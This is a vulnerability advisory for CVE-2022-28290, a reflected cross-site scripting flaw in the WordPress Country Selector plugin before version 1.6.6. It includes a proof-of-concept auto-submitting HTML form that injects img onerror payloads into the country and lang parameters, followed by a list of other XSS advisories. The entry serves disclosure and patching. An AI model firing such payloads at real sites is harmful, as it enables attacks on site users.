Country Selector < 1.6.6 – Reflected Cross-Site Scripting | CVE 2022-28290 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the country and lang parameters before outputting them back in the response, leading to a Reflected Cross-Site Scripting

Proof of Concept

<html>
  <body onload="document.forms[0].submit()">
    <form action="https://example.com/wp-admin/admin-ajax.php?action=check_country_selector" method="POST">
      <input type="hidden" name="country" value="<img+src=x+onerror=alert(/XSS-country/)>" />
      <input type="hidden" name="lang" value="<img+src=x+onerror=alert(/XSS-lang/)>" />
      <input type="hidden" name="site_locate" value="en-US" />
    </form>
  </body>
</html>

Affects Plugins

wordpress-country-selector

Fixed in 1.6.6

References

CVE

URL

https://cybersecurityworks.com/zerodays/cve-2022-28290-reflected-cross-site-scripting-in-welaunch.html

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Verified

Yes

WPVDB ID

6c5a4bce-6266-4cfc-bc87-4fc3e36cb479

Timeline

Publicly Published

2022-04-20 (about 3 years ago)

Added

2022-04-20 (about 3 years ago)

Last Updated

2022-04-21 (about 3 years ago)

Other

Published

Title

Published

2014-08-01

Title

2-Click-Socialmedia-Buttons <= 0.34 - Cross Site Scripting

Published

2014-08-01

Title

Traffic Analyzer 3.3.2 - js/ta_loaded.js.php aoid Parameter XSS

Published

2025-08-30

Title

ACF Recent Posts Widget <= 5.9.3 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-11-04

Title

SVT Simple <= 1.0.1 - Reflected Cross-Site Scripting

Published

2024-11-12

Title

Royal Elementor Addons and Templates < 1.7.1002 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting via Form Builder Widget